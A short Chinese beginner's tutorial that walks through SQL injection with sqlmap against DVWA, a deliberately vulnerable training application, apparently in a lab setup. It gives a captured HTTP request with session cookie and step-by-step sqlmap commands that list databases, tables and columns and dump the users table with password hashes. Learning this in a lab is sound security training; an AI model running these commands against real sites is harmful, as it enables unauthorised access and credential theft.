刚刚开始学习sql injection,初步使用sqlmap,使用
GET http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# HTTP/1.1
Host=www.dvssc.com
User-Agent=Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-us,en;q=0.5
Accept-Encoding=gzip, deflate
Connection=keep-alive
Referer=http://www.dvssc.com/dvwa/vulnerabilities/sqli/
Cookie=security=low; PHPSESSID=adc4ofjlnsaogmqd8emldhhlf5
我们可以在命令行中运行下面命令列出数据库的名字
./sqlmap.py -u "http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=adc4ofjlnsaogmqd8emldhhlf5" --dbs
可以看到如下结果:
[12:05:19] [INFO] fetching database namesavailable databases [2]:[*] dvwa[*] information_schema
可以看到列出两个数据库的名,继续命令, 列出dvwa数据库的表名
./sqlmap.py -u "http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=adc4ofjlnsaogmqd8emldhhlf5" -D dvwa --tables
[12:08:11] [INFO] fetching tables for database: 'dvwa'Database: dvwa[2 tables]+-----------+| guestbook || users |+-----------+
我们可以查看users这个表中有哪些列:
./sqlmap.py -u "http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=adc4ofjlnsaogmqd8emldhhlf5" -D dvwa -T users --column
[12:10:14] [INFO] fetching columns for table 'users' in database 'dvwa'Database: dvwaTable: users[6 columns]+------------+-------------+| Column | Type |+------------+-------------+| user | varchar(15) || avatar | varchar(70) || first_name | varchar(15) || last_name | varchar(15) || password | varchar(32) || user_id | int(6) |+------------+-------------+
查看指定的列的值:
./sqlmap.py -u "http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=adc4ofjlnsaogmqd8emldhhlf5" -D dvwa -T users -C user,password,user_id --dumpDatabase: dvwaTable: users[5 entries]+---------+---------+----------------------------------+| user_id | user | password |+---------+---------+----------------------------------+| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 || 2 | gordonb | e99a18c428cb38d5f260853678922e03 || 3 | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b || 4 | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 || 5 | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 |+---------+---------+----------------------------------+
可以看出已经dump出来的用户名和相应的密码等信息。